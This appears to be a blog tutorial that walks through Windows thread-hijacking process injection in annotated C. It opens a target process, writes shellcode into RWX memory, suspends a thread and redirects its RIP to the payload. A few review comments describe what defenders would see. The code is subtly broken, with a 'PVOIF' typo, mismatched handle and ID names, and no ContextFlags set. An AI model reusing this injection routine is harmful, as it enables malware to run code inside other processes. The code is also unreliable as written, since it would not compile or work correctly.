The Real Hugo

Thread Hijacking

  • Open the process, then allocate and write memory
// Open the target process and stage the payload bytes inside its address space.
HANDLE hProcess = OpenProcess(
    PROCESS_ALL_ACCESS, // Requests all possible access rights to the process
    FALSE, // The returned handle is not inheritable by child processes
    processId // Previously stored ID of the target process
);
PVOIF remoteBuffer = VirtualAllocEx(
    hProcess, // Opened target process
    NULL, // No preferred base address; the system chooses where to place the region
    sizeof shellcode, // Region size of the memory allocation, in bytes
    (MEM_RESERVE | MEM_COMMIT), // Reserves and commits the pages in a single call
    PAGE_EXECUTE_READWRITE // The committed pages are writable and executable at the same time
);
// NOTE(review): from a defender's viewpoint, the observable footprint of this step is a
// cross-process allocation that is writable and executable, immediately followed by a
// write of raw bytes into it.
WriteProcessMemory(
    processHandle, // Opened target process
    remoteBuffer, // Allocated memory region in the target
    shellcode, // Data to write
    sizeof shellcode, // Byte size of the data
    NULL // The number of bytes actually written is not requested
);
  • Take a thread snapshot and get the first thread
// Enumerate threads through a Toolhelp snapshot.
THREADENTRY32 threadEntry; // Receives one thread entry at a time from the snapshot

HANDLE hSnapshot = CreateToolhelp32Snapshot( // Takes a snapshot of the specified system state
    TH32CS_SNAPTHREAD, // Includes all threads in the system, not only those of the target process
    0 // Process ID argument; 0 means the current process, but it is ignored for TH32CS_SNAPTHREAD
);
Thread32First( // Obtains the first thread entry in the snapshot
    hSnapshot, // Handle of the snapshot
    &threadEntry // Pointer to the THREADENTRY32 structure that receives the entry
);

// Walk the remaining entries; each entry carries the ID of the process that owns the thread.
while (Thread32Next( // Obtains the next thread entry in the snapshot
    snapshot, // Handle of the snapshot
    &threadEntry // Pointer to the THREADENTRY32 structure that receives the entry
)) {
  • Get a handle to the target thread
if (threadEntry.th32OwnerProcessID == processID) // Keeps only threads owned by the target process
        {
            HANDLE hThread = OpenThread(
                THREAD_ALL_ACCESS, // Requests all possible access rights to the thread
                FALSE, // The returned handle is not inheritable by child processes
                threadEntry.th32ThreadID // Thread ID read from the current THREADENTRY32 entry
            );
            break; // The first matching thread is used; the remaining entries are not examined
        }
  • Suspend the thread, get its context and change $rip
// Redirect the suspended thread's execution to the remote buffer.
SuspendThread(hThread); // The thread is stopped before its context is read and replaced
CONTEXT context; // Receives the thread's register state
GetThreadContext(
    hThread, // Handle for the thread 
    &context // Pointer to the CONTEXT structure that receives the current registers
);
context.Rip = (DWORD_PTR)remoteBuffer; // Points RIP at the remote buffer written earlier, so the thread runs the payload once resumed
// NOTE(review): the defender-visible effect of this step is a thread whose instruction
// pointer is moved into a freshly allocated region that is both writable and executable.
SetThreadContext(
    hThread, // Handle for the thread 
    &context // Pointer to the modified context structure
);
ResumeThread(
    hThread // Handle for the thread; execution continues at the new RIP
);